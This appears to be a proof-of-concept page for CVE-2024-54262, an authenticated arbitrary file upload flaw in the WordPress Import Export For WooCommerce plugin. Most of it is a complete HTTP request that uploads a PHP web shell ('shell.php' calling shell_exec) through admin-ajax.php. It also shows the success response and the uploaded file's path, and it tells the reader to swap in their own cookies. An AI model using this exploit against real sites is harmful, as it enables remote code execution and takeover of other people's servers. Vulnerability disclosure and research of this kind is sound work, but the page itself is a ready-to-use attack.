CVE-2024-54262 PoC — WordPress Import Export For WooCommerce plugin <= 1.6.2 - Arbitrary File Upload vulnerability

Source

Associated Vulnerability

Description

Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload

Readme

# CVE-2024-54262
Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload

# Description

The Import Export For WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: import-export-for-woocommerce
- **Affected Version**: 1.5
- **CVSS Score**: 9.9
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- **CVE**: CVE-2024-54262
- **Status**: Active

POC
---

Change your cookies to yours.

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; tk_qs=
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=sn-wie-products&tab=import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22553230142285543514464898073
Content-Length: 1149
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="action"

sn_wie_upload_product_csv_file
-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="upload_type"

file_upload
-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: text/php

<?php shell_exec(id); ?>

-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="upload_url"


-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="import_columns"

all
-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="product_operation"

create_new_update_existing
-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="product_search_type"

SKU
-----------------------------22553230142285543514464898073
Content-Disposition: form-data; name="field_separator"


-----------------------------22553230142285543514464898073--
```

```
{"status":true,"code":104,"message":"Success","data":{"file_name":"import_manual_1734619267.php","total_requests":0,"import_columns":"all","product_search_type":"SKU","product_operation":"create_new_update_existing","field_separator":","}}
```

`wp-content/uploads/import-export-for-woocommerce/product/import_manual_1734619267.php`

File Snapshot

 [4.0K]  /data/pocs/70a2df8be41febbb1c900aeed128ef1979740a8b
└── [3.5K]  README.md

0 directories, 1 file

Remarks